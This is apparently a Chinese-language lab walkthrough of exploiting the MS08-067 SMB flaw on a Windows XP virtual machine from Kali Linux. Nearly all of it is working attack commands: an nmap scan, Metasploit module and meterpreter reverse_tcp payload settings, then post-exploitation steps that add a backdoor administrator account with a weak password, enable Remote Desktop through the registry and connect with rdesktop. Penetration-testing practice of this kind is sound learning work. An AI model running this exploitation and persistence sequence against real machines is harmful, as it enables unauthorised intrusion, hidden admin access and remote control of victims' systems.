环境
| 主机 | ip |
|---|---|
| kali Linux | 192.168.252.128 |
| Windows xp | 192.168.252.148 |
漏洞介绍
https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2008/ms08-067
Metasploit渗透测试模块
Metasploit介绍及命令:https://blog.csdn.net/qq_39583774/article/details/119144119
渗透
nmap -sV 192.168.252.148
msfconsole
search ms08_067 #搜索
use exploit/windows/smb/ms08_067_netapi #选择模块
set payload windows/meterpreter/reverse_tcp #攻击模块装载
set rhost 192.168.252.148 #设置攻击目标ip
set lhost 192.168.252.128 #设置kali ip
set target 7 #选择对应的版本 show targets可查看版本 set target+版本序号 选择版本这里是xp英文版所以选择7
run
出现错误
解决
windows xp上操作
windos+R #打开运行
gpedit.msc
点击应用确定
打开服务
回到kali 继续运行run
如出现乱码chcp 65001 解决。
远程操作
这里只能查看不能操作
net user admin 123456 /add #添加新用户
net localgroup administrators admin /add #将用户加入administrators组
开启远程桌面:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
rdesktop 192.168.252.148 #开启远程桌面,这里必须在图像化界面上
因为这里是xp家庭版无法开启,如果是专业版应该是可以的。
